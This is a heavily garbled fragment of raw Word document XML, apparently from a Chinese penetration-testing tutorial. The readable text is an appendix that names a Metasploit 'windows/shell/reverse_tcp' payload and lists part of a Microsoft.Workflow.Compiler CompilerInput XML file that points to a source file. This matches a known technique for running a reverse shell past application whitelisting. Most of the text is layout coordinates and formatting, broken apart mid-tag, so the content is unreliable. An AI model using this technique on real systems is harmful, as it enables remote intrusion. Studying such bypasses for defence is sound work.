5257,6390,15257,6388,15257,6387,15257,6386,15257,6385,15257,6383,15257,6382,15257,6381,15257,6379,15257,6378,15257,6376,15257,6375,15257,6373,15257,6372,15257,6370,15257,6369,15257,6367,15257,6365,15257,6364,15257,6362,15257,6360,15257,6358,15257,6356,15257,6354,15257,6352,15257,6350,15257,6348,15257,6346,15257,6344,15257,6342,15257,6339,15257,6337,15257,6335,15257,6332,15257,6330,15257,6327,15257,6325,15257,6322,15257,6320,15257,6317,15257,6314,15257,6312,15257,6309,15257,6306,15257,6303,15257,6300,15257,6297,15257,6297,15257,6297,15257,6297,15257,6297,15257,6297,15257,6297,15257,6297,15257,6297,15257,6297,15257,6297,15257,6297,15257,6297,15256,6297,15256,6297,15256,6297,15256,6297,15256,6297,15256,6297,15256,6297,15256,6297,15256,6297,15255,6297,15255,6297,15255,6297,15255,6297,15255,6297,15254,6297,15254,6297,15254,6297,15253,6297,15253,6297,15253,6297,15252,6297,15252,6297,15251,6297,15251,6297,15250,6297,15250,6297,15249,6297,15248,6297,15248,6297,15247,6297,15246,6297,15245,6297,15245,6297,15244,6297,15243,6297,15242,6297,15241,6297,15240,6297,15239,6297,15238,6297,15237,6297,15235,6297,15234,6297,15233,6297,15231,6297,15230,6297,15229,6297,15227,6297,15226,6297,15224,6297,15222,6297,15221,6297,15219,6297,15217,6297,15215,6297,15213,6297,15211,6297,15209,6297,15207,6297,15205,6297,15203,6297,15200,6297,15198,6297,15195,6297,15193,6297,15190,6297,15188,6297,15185,6297,15182,6297,15179,6297,15176,6297,15173,6297,15170,6297,15167,6297,15164,6297,15160,6297,15157,6297,15154,6297,15150,6297,15146,6297,15143,6297,15139,6297,15135,6297,15131,6297,15127,6297,15123,6297,15119,6297,15114,6297,15110,6297,15105,6297,15101,6297,15096,6297,15091,6297,15086,6297,15081,6297,15076,6297,15071,6297,15066,6297,15061,6297,15055,6297,15050,6297,15044,6297,15038,6297,15032,6297,15026,6297,15020,6297,15014,6297,15008,6297,15002e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:283.500pt;margin-top:762.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5670,15250" coordsize="130,270">
        <v:shape style="position:absolute;left:5670;top:15250;width:130;height:270" coordorigin="5670,15250" coordsize="130,270" path="m5682,15272l5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5682,15272,5683,15272,5683,15272,5683,15272,5683,15272,5683,15272,5683,15272,5683,15272,5683,15272,5684,15272,5684,15272,5684,15272,5684,15272,5684,15272,5685,15272,5685,15272,5685,15272,5685,15272,5686,15272,5686,15272,5686,15272,5687,15272,5687,15272,5688,15272,5688,15272,5688,15272,5689,15272,5689,15272,5690,15272,5690,15272,5691,15272,5691,15272,5692,15272,5692,15272,5693,15272,5694,15272,5694,15272,5695,15272,5696,15272,5696,15272,5697,15272,5698,15272,5699,15272,5700,15272,5701,15272,5701,15272,5702,15272,5703,15272,5704,15272,5705,15272,5706,15272,5707,15272,5708,15272,5710,15272,5711,15272,5712,15272,5713,15272,5714,15272,5716,15272,5717,15272,5718,15272,5720,15272,5721,15272,5723,15272,5724,15272,5726,15272,5727,15272,5729,15272,5730,15272,5732,15272,5734,15272,5736,15272,5737,15272,5739,15272,5741,15272,5743,15272,5745,15272,5747,15272,5749,15272,5751,15272,5753,15272,5755,15272,5757,15272,5760,15272,5762,15272,5764,15272,5767,15272,5769,15272,5772,15272,5774,15272,5777,15272,5779,15272,5782,15272,5785,15272,5787,15272,5790,15272,5793,15272,5796,15272,5799,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15273,5802,15273,5802,15273,5802,15273,5802,15273,5802,15274,5802,15274,5802,15274,5802,15274,5802,15275,5802,15275,5802,15275,5802,15276,5802,15276,5802,15277,5802,15277,5802,15278,5802,15278,5802,15279,5802,15279,5802,15280,5802,15281,5802,15281,5802,15282,5802,15283,5802,15284,5802,15285,5802,15285,5802,15286,5802,15287,5802,15288,5802,15290,5802,15291,5802,15292,5802,15293,5802,15294,5802,15296,5802,15297,5802,15298,5802,15300,5802,15301,5802,15303,5802,15304,5802,15306,5802,15308,5802,15310,5802,15311,5802,15313,5802,15315,5802,15317,5802,15319,5802,15321,5802,15324,5802,15326,5802,15328,5802,15331,5802,15333,5802,15336,5802,15338,5802,15341,5802,15344,5802,15346,5802,15349,5802,15352,5802,15355,5802,15358,5802,15361,5802,15365,5802,15368,5802,15371,5802,15375,5802,15378,5802,15382,5802,15386,5802,15390,5802,15393,5802,15397,5802,15402,5802,15406,5802,15410,5802,15414,5802,15419,5802,15423,5802,15428,5802,15432,5802,15437,5802,15442,5802,15447,5802,15452,5802,15457,5802,15462,5802,15468,5802,15473,5802,15479,5802,15484,5802,15490,5802,15496,5802,15502,5802,15508,5802,15514,5802,15520,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5801,15527,5801,15527,5801,15527,5801,15527,5801,15527,5801,15527,5801,15527,5801,15527,5801,15527,5800,15527,5800,15527,5800,15527,5800,15527,5800,15527,5799,15527,5799,15527,5799,15527,5799,15527,5798,15527,5798,15527,5798,15527,5797,15527,5797,15527,5797,15527,5796,15527,5796,15527,5795,15527,5795,15527,5795,15527,5794,15527,5794,15527,5793,15527,5792,15527,5792,15527,5791,15527,5791,15527,5790,15527,5789,15527,5789,15527,5788,15527,5787,15527,5787,15527,5786,15527,5785,15527,5784,15527,5783,15527,5782,15527,5781,15527,5780,15527,5780,15527,5779,15527,5777,15527,5776,15527,5775,15527,5774,15527,5773,15527,5772,15527,5771,15527,5769,15527,5768,15527,5767,15527,5765,15527,5764,15527,5763,15527,5761,15527,5760,15527,5758,15527,5757,15527,5755,15527,5753,15527,5752,15527,5750,15527,5748,15527,5746,15527,5745,15527,5743,15527,5741,15527,5739,15527,5737,15527,5735,15527,5733,15527,5731,15527,5729,15527,5726,15527,5724,15527,5722,15527,5719,15527,5717,15527,5715,15527,5712,15527,5710,15527,5707,15527,5704,15527,5702,15527,5699,15527,5696,15527,5694,15527,5691,15527,5688,15527,5685,15527,5682,15527,5682,15527,5682,15527,5682,15527,5682,15527,5682,15527,5682,15527,5682,15527,5682,15527,5682,15527,5682,15527,5682,15527,5682,15527,5682,15527,5682,15526,5682,15526,5682,15526,5682,15526,5682,15526,5682,15526,5682,15526,5682,15526,5682,15525,5682,15525,5682,15525,5682,15525,5682,15524,5682,15524,5682,15524,5682,15524,5682,15523,5682,15523,5682,15522,5682,15522,5682,15521,5682,15521,5682,15520,5682,15520,5682,15519,5682,15519,5682,15518,5682,15517,5682,15516,5682,15516,5682,15515,5682,15514,5682,15513,5682,15512,5682,15511,5682,15510,5682,15509,5682,15508,5682,15507,5682,15506,5682,15504,5682,15503,5682,15502,5682,15500,5682,15499,5682,15497,5682,15496,5682,15494,5682,15492,5682,15491,5682,15489,5682,15487,5682,15485,5682,15483,5682,15481,5682,15479,5682,15477,5682,15475,5682,15473,5682,15470,5682,15468,5682,15465,5682,15463,5682,15460,5682,15458,5682,15455,5682,15452,5682,15449,5682,15446,5682,15443,5682,15440,5682,15437,5682,15434,5682,15431,5682,15427,5682,15424,5682,15420,5682,15416,5682,15413,5682,15409,5682,15405,5682,15401,5682,15397,5682,15393,5682,15389,5682,15384,5682,15380,5682,15375,5682,15371,5682,15366,5682,15361,5682,15357,5682,15352,5682,15347,5682,15341,5682,15336,5682,15331,5682,15325,5682,15320,5682,15314,5682,15308,5682,15303,5682,15297,5682,15291,5682,15284,5682,15278,5682,15272e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:289.500pt;margin-top:762.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5790,15250" coordsize="130,270">
        <v:shape style="position:absolute;left:5790;top:15250;width:130;height:270" coordorigin="5790,15250" coordsize="130,270" path="m5802,15272l5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5802,15272,5803,15272,5803,15272,5803,15272,5803,15272,5803,15272,5803,15272,5803,15272,5803,15272,5804,15272,5804,15272,5804,15272,5804,15272,5804,15272,5805,15272,5805,15272,5805,15272,5806,15272,5806,15272,5806,15272,5806,15272,5807,15272,5807,15272,5808,15272,5808,15272,5808,15272,5809,15272,5809,15272,5810,15272,5810,15272,5811,15272,5811,15272,5812,15272,5813,15272,5813,15272,5814,15272,5814,15272,5815,15272,5816,15272,5817,15272,5817,15272,5818,15272,5819,15272,5820,15272,5821,15272,5821,15272,5822,15272,5823,15272,5824,15272,5825,15272,5826,15272,5827,15272,5829,15272,5830,15272,5831,15272,5832,15272,5833,15272,5834,15272,5836,15272,5837,15272,5838,15272,5840,15272,5841,15272,5843,15272,5844,15272,5846,15272,5847,15272,5849,15272,5850,15272,5852,15272,5854,15272,5856,15272,5857,15272,5859,15272,5861,15272,5863,15272,5865,15272,5867,15272,5869,15272,5871,15272,5873,15272,5875,15272,5878,15272,5880,15272,5882,15272,5884,15272,5887,15272,5889,15272,5892,15272,5894,15272,5897,15272,5899,15272,5902,15272,5905,15272,5907,15272,5910,15272,5913,15272,5916,15272,5919,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15273,5922,15273,5922,15273,5922,15273,5922,15273,5922,15274,5922,15274,5922,15274,5922,15274,5922,15275,5922,15275,5922,15275,5922,15276,5922,15276,5922,15277,5922,15277,5922,15278,5922,15278,5922,15279,5922,15279,5922,15280,5922,15281,5922,15281,5922,15282,5922,15283,5922,15284,5922,15285,5922,15285,5922,15286,5922,15287,5922,15288,5922,15290,5922,15291,5922,15292,5922,15293,5922,15294,5922,15296,5922,15297,5922,15298,5922,15300,5922,15301,5922,15303,5922,15304,5922,15306,5922,15308,5922,15310,5922,15311,5922,15313,5922,15315,5922,15317,5922,15319,5922,15321,5922,15324,5922,15326,5922,15328,5922,15331,5922,15333,5922,15336,5922,15338,5922,15341,5922,15344,5922,15346,5922,15349,5922,15352,5922,15355,5922,15358,5922,15361,5922,15365,5922,15368,5922,15371,5922,15375,5922,15378,5922,15382,5922,15386,5922,15390,5922,15393,5922,15397,5922,15402,5922,15406,5922,15410,5922,15414,5922,15419,5922,15423,5922,15428,5922,15432,5922,15437,5922,15442,5922,15447,5922,15452,5922,15457,5922,15462,5922,15468,5922,15473,5922,15479,5922,15484,5922,15490,5922,15496,5922,15502,5922,15508,5922,15514,5922,15520,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5921,15527,5921,15527,5921,15527,5921,15527,5921,15527,5921,15527,5921,15527,5921,15527,5921,15527,5920,15527,5920,15527,5920,15527,5920,15527,5920,15527,5919,15527,5919,15527,5919,15527,5919,15527,5918,15527,5918,15527,5918,15527,5917,15527,5917,15527,5917,15527,5916,15527,5916,15527,5915,15527,5915,15527,5915,15527,5914,15527,5914,15527,5913,15527,5913,15527,5912,15527,5911,15527,5911,15527,5910,15527,5909,15527,5909,15527,5908,15527,5907,15527,5907,15527,5906,15527,5905,15527,5904,15527,5903,15527,5902,15527,5902,15527,5901,15527,5900,15527,5899,15527,5898,15527,5896,15527,5895,15527,5894,15527,5893,15527,5892,15527,5891,15527,5889,15527,5888,15527,5887,15527,5886,15527,5884,15527,5883,15527,5881,15527,5880,15527,5878,15527,5877,15527,5875,15527,5873,15527,5872,15527,5870,15527,5868,15527,5867,15527,5865,15527,5863,15527,5861,15527,5859,15527,5857,15527,5855,15527,5853,15527,5851,15527,5849,15527,5846,15527,5844,15527,5842,15527,5840,15527,5837,15527,5835,15527,5832,15527,5830,15527,5827,15527,5825,15527,5822,15527,5819,15527,5816,15527,5814,15527,5811,15527,5808,15527,5805,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15526,5802,15526,5802,15526,5802,15526,5802,15526,5802,15526,5802,15526,5802,15526,5802,15525,5802,15525,5802,15525,5802,15525,5802,15524,5802,15524,5802,15524,5802,15524,5802,15523,5802,15523,5802,15522,5802,15522,5802,15521,5802,15521,5802,15520,5802,15520,5802,15519,5802,15519,5802,15518,5802,15517,5802,15516,5802,15516,5802,15515,5802,15514,5802,15513,5802,15512,5802,15511,5802,15510,5802,15509,5802,15508,5802,15507,5802,15506,5802,15504,5802,15503,5802,15502,5802,15500,5802,15499,5802,15497,5802,15496,5802,15494,5802,15492,5802,15491,5802,15489,5802,15487,5802,15485,5802,15483,5802,15481,5802,15479,5802,15477,5802,15475,5802,15473,5802,15470,5802,15468,5802,15465,5802,15463,5802,15460,5802,15458,5802,15455,5802,15452,5802,15449,5802,15446,5802,15443,5802,15440,5802,15437,5802,15434,5802,15431,5802,15427,5802,15424,5802,15420,5802,15416,5802,15413,5802,15409,5802,15405,5802,15401,5802,15397,5802,15393,5802,15389,5802,15384,5802,15380,5802,15375,5802,15371,5802,15366,5802,15361,5802,15357,5802,15352,5802,15347,5802,15341,5802,15336,5802,15331,5802,15325,5802,15320,5802,15314,5802,15308,5802,15303,5802,15297,5802,15291,5802,15284,5802,15278,5802,15272e x" fillcolor="#fefefe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93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20"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>附录：</w:t>
      </w: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p</w:t>
      </w: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oc.xml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0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注：window</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s/shell/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="371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5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1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?xml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version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="13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6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"1.0"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encoding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="13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6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"utf‐8"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>?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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="136" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="142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CompilerInput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xmlns:i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5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"http://www.w3.org/2001/XMLSchema‐instance"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13"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>xml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ns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5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"http://schemas.datacontract.org/200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4/07/Microsoft.Workflow.Compiler"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549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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t>  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files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="13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xmlns:d2p1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="14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"http://schemas.microsoft.com/2003/10/Serializatio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659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>n/Arrays"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="156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4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d2p1:string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;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Micropoor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="12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tcp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&lt;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d2p1:string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;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5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="20"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="136" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1429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6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t>  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parameters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="14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xmlns:d2p1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"http://schemas.datacontract.org/2004/07/Syste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m.Workflow.ComponentModel.Compiler"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="19"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="141" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1324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7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12"/>
        </w:rPr>
        <w:t>  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assemblyNames</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="14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xmlns:d3p1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="13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"http://schemas.microsoft.com/2003/10/Seria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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>lization/Arrays"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> 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xmlns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5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"http://schemas.datacontract.org/2004/07/System.Co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659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>deDom.Compiler"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996c38"/>
          <w:spacing w:val="18"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1429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8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t>  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compilerOptions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="11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i:nil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"true"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xmlns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"http://schemas.datacontract.org/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2004/07/System.CodeDom.Compiler"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996c38"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/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&gt;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520.111pt;margin-top:0.0pt;width:0.0pt;height:748.601pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,14972">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:14972" coordorigin="10402,0" coordsize="0,14972" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,1,10402,3,10402,4,10402,6,10402,8,10402,11,10402,15,10402,19,10402,24,10402,29,10402,36,10402,43,10402,51,10402,60,10402,71,10402,82,10402,94,10402,108,10402,122,10402,138,10402,156,10402,174,10402,195,10402,216,10402,239,10402,264,10402,291,10402,319,10402,349,10402,380,10402,414,10402,450,10402,487,10402,527,10402,568,10402,612,10402,658,10402,706,10402,756,10402,809,10402,864,10402,922,10402,982,10402,1045,10402,1110,10402,1178,10402,1249,10402,1322,10402,1399,10402,1478,10402,1560,10402,1645,10402,1733,10402,1824,10402,1919,10402,2016,10402,2117,10402,2221,10402,2329,10402,2439,10402,2554,10402,2672,10402,2793,10402,2918,10402,3047,10402,3179,10402,3316,10402,3456,10402,3600,10402,3748,10402,3900,10402,4056,10402,4216,10402,4380,10402,4548,10402,4721,10402,4898,10402,5080,10402,5265,10402,5456,10402,5651,10402,5850,10402,6054,10402,6263,10402,6476,10402,6695,10402,6918,10402,7146,10402,7379,10402,7617,10402,7860,10402,8108,10402,8362,10402,8620,10402,8884,10402,9153,10402,9428,10402,9708,10402,9994,10402,10285,10402,10581,10402,10884,10402,11192,10402,11505,10402,11825,10402,12150,10402,12482,10402,12819,10402,13162,10402,13512,10402,13868,10402,14229,10402,14597,10402,14972e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:48.0pt;width:451.800pt;height:702.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId16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86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35" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1429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9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t>  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coreAssemblyFileName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="11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xmlns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"http://schemas.datacontract.org/2004/07/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System.CodeDom.Compiler"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;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coreAssemblyFileName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="156" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1324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10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="10"/>
        </w:rPr>
